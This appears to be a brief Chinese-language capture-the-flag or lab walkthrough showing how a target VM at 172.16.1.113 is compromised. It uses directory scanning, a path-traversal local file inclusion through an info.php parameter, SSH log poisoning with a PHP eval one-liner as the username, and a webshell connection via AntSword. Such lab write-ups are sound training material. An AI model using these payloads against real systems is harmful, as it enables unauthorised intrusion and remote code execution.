1.扫描靶机地址

可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了

2.打开网站

3.进行目录扫描

dirb    http：//172.16.1.113

发现有一个antibot_image目录

4.访问这个目录

可以看到有一个info.php

5.查看页面源代码

可以发现可以进行get传参

6.尝试查看日志文件

http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log

可以看到页面上有日志显示 说明存在文件包含漏洞

7.尝试使用ssh进行连接

ssh aaaaaaaaaa@172.16.1.113 -p 2211 

可以看到日志有记录显示

8.尝试写入一句话木马

ssh '<?php @eval($_POST[cmd]); ?>'@172.16.1.113 -p 2211

9.使用蚁剑进行连接

可以连接成功 成功获取webshell